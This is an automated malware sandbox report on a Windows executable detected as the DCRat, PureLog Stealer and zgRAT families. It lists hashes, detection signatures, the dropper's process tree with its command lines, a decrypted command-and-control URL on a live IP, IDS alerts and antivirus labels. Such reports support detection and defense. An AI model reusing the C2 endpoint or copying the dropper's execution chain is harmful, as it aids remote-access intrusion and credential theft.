Windows Analysis Report
7vP2IvNXqx.exe

Overview

General Information

Sample name: 7vP2IvNXqx.exe (renamed because original name is a hash value)
Original sample name: 1a3a764c4b4974435dba8926e7137766.exe
Analysis ID: 1583844
MD5: 1a3a764c4b4974435dba8926e7137766
SHA1: 7cf7f1525fc7deb3d8523ac550a3787765ce6742
SHA256: 2028b4c9f540e5d74ce2ad0f9a443badc827f1f70af23dfd01455747e564b1a2
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 7vP2IvNXqx.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\7vP2IvNXqx.exe" MD5: 1A3A764C4B4974435DBA8926E7137766)
    • wscript.exe (PID: 7328 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7408 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\yu2eKcIww0WQz1diSHkj97Iay5LLlL45l6P5L9G4ltB7.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • winIntorefruntimebroker.exe (PID: 7460 cmdline: "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll/winIntorefruntimebroker.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
          • cmd.exe (PID: 7516 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5K6fCoMBVq.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7572 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 7588 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 7652 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
              • cmd.exe (PID: 7716 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ECvQfnJznV.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • chcp.com (PID: 7764 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                • PING.EXE (PID: 7780 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 7952 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                  • cmd.exe (PID: 8036 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ddp3dI2Wa5.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • chcp.com (PID: 8080 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                    • w32tm.exe (PID: 8096 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                    • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 2284 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                      • cmd.exe (PID: 1368 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qlEmwzstBs.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                        • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                        • chcp.com (PID: 5776 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                        • w32tm.exe (PID: 4464 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                        • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 5796 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                          • cmd.exe (PID: 7308 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\DoC45cXmCX.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                            • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                            • chcp.com (PID: 2000 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                            • w32tm.exe (PID: 7428 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                            • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 7352 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                              • cmd.exe (PID: 6276 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                • chcp.com (PID: 7468 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                • PING.EXE (PID: 7492 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                                • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 7600 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                                  • cmd.exe (PID: 7728 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\GxEp7zFCwB.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                    • conhost.exe (PID: 3744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                    • chcp.com (PID: 7672 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                    • w32tm.exe (PID: 7688 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                                    • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 3384 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                                      • cmd.exe (PID: 4136 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UCvjmtCiY3.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                        • conhost.exe (PID: 2716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                        • chcp.com (PID: 416 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                        • w32tm.exe (PID: 5724 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                                        • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 7780 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                                          • cmd.exe (PID: 8016 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bviytIjYVg.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                            • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                            • chcp.com (PID: 8080 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                            • w32tm.exe (PID: 7964 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                                            • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 8004 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                                              • cmd.exe (PID: 8140 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ujuZrulyBl.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                                • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                                • chcp.com (PID: 6768 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                                • w32tm.exe (PID: 6876 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                                                • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 7056 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                                                  • cmd.exe (PID: 8172 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nXpNUGu1Ke.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                                    • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                                    • chcp.com (PID: 5968 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                                    • w32tm.exe (PID: 5576 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                                                    • fXvSafnhbinoSxnWSYFNsCJETLnb.exe (PID: 1608 cmdline: "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe" MD5: 07A0FB75F52C87371C88F48AE80AFA1B)
                                                      • cmd.exe (PID: 4340 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0WKriXx1WO.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                                        • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                                        • chcp.com (PID: 4336 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
{"C2 url": "http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal"}
Source | Rule | Description | Author | Strings
7vP2IvNXqx.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
7vP2IvNXqx.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.1650087687.00000000078DE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000009.00000002.1759792480.00000000029C9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000004.00000000.1675544787.0000000000FF2000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.1650555620.00000000078DA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.1649700859.0000000006FC7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.3.7vP2IvNXqx.exe.792c722.1.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.7vP2IvNXqx.exe.792c722.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.7vP2IvNXqx.exe.7015722.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.7vP2IvNXqx.exe.7015722.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

System Summary

Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\7vP2IvNXqx.exe", ParentImage: C:\Users\user\Desktop\7vP2IvNXqx.exe, ParentProcessId: 7280, ParentProcessName: 7vP2IvNXqx.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe" , ProcessId: 7328, ProcessName: wscript.exe
Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\7vP2IvNXqx.exe", ParentImage: C:\Users\user\Desktop\7vP2IvNXqx.exe, ParentProcessId: 7280, ParentProcessName: 7vP2IvNXqx.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe" , ProcessId: 7328, ProcessName: wscript.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-03T18:32:05.218406+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 206.188.197.24 | 80 | TCP
2025-01-03T18:32:16.780963+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 206.188.197.24 | 80 | TCP
2025-01-03T18:32:23.515197+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 206.188.197.24 | 80 | TCP
2025-01-03T18:32:30.124537+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 206.188.197.24 | 80 | TCP
2025-01-03T18:32:36.765117+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 206.188.197.24 | 80 | TCP
2025-01-03T18:32:47.468862+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 206.188.197.24 | 80 | TCP
2025-01-03T18:32:54.686916+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 206.188.197.24 | 80 | TCP
2025-01-03T18:33:01.280651+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49780 | 206.188.197.24 | 80 | TCP
2025-01-03T18:33:08.764962+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49827 | 206.188.197.24 | 80 | TCP
2025-01-03T18:33:15.561834+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49868 | 206.188.197.24 | 80 | TCP
2025-01-03T18:33:22.155558+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49907 | 206.188.197.24 | 80 | TCP
2025-01-03T18:33:28.718020+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49945 | 206.188.197.24 | 80 | TCP
2025-01-03T18:33:39.030477+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 50010 | 206.188.197.24 | 80 | TCP
2025-01-03T18:33:45.218167+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 50015 | 206.188.197.24 | 80 | TCP
2025-01-03T18:33:55.796071+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 50016 | 206.188.197.24 | 80 | TCP

AV Detection

Source: 7vP2IvNXqx.exe, Avira: detected
Source: C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\ddp3dI2Wa5.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\5K6fCoMBVq.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\GxEp7zFCwB.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\bviytIjYVg.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\0WKriXx1WO.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\AM6p4h9HDRVrPwzz61v07snODxh5fKKX6hWDy9cgUFkUWdr9KsZj3Jw8eGFm.vbe, Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\qlEmwzstBs.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\ujuZrulyBl.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\UCvjmtCiY3.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\ECvQfnJznV.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\DoC45cXmCX.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\nXpNUGu1Ke.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: 00000004.00000002.1691880334.00000000035DD000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: DCRat {"C2 url": "http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/LinejsProcessauthFlowerTestLocal"}
Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, ReversingLabs: Detection: 78%
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, ReversingLabs: Detection: 78%
Source: C:\Recovery\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, ReversingLabs: Detection: 78%
Source: C:\Windows\INF\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, ReversingLabs: Detection: 78%
Source: C:\Windows\en-GB\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, ReversingLabs: Detection: 78%
Source: 7vP2IvNXqx.exe, ReversingLabs: Detection: 65%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 98.3% probability
Source: C:\Program Files (x86)\Windows Mail\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, Joe Sandbox ML: detected
Source: 7vP2IvNXqx.exe, Joe Sandbox ML: detected
Source: 00000004.00000002.1691880334.00000000035DD000.00000004.00000800.00020000.00000000.sdmp, String decryptor: ["4Udjet8IkIRumTH5QPjBwoctxjTGFWjXaxId1XFTTO1KbuakK3Z6C17Q2uv5Z2CNi3TzLoD3JQrhwSSDIt5M7nUi01kHlK3aMolhblZgzgwwKadkcswq60Q5jv8TD6R9","3461c1a9b46d8f4901f52a2fbe6a3dc2e8631664402195a9c63193388a0b8966","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
Source: 00000004.00000002.1691880334.00000000035DD000.00000004.00000800.00020000.00000000.sdmp, String decryptor: [["http://206.188.197.24/Process6cdn/3ImageLongpollDump/geoDefaultMultiProcess/lowLine/Processdumpmulti/","LinejsProcessauthFlowerTestLocal"]]
Source: 7vP2IvNXqx.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, Directory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe
Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, Directory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\e226a7d7102d53
Source: 7vP2IvNXqx.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 7vP2IvNXqx.exe
Source: Binary string: System.Windows.Forms.pdb source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000016.00000002.1942135265.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: KZll\System.pdb source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000000F.00000002.1883052954.000000001B550000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2484543389.000000001B460000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdb source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2201826455.000000001B201000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2484543389.000000001B460000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\7vP2IvNXqx.exe, Code function: 0_2_002DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_002DA69B
Source: C:\Users\user\Desktop\7vP2IvNXqx.exe, Code function: 0_2_002EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_002EC220
Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, File opened: C:\Users\user
Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe, Code function: 4x nop then jmp 00007FFD9B8920B6h, 4_2_00007FFD9B880862
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Code function: 4x nop then jmp 00007FFD9BAC20B6h, 9_2_00007FFD9BAB085C
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Code function: 4x nop then jmp 00007FFD9BAC20B6h, 15_2_00007FFD9BAC1EAE
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Code function: 4x nop then jmp 00007FFD9BAB20B6h, 22_2_00007FFD9BAA0862
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exe, Code function: 4x nop then jmp 00007FFD9BAB20B6h, 27_2_00007FFD9BAB1EAE
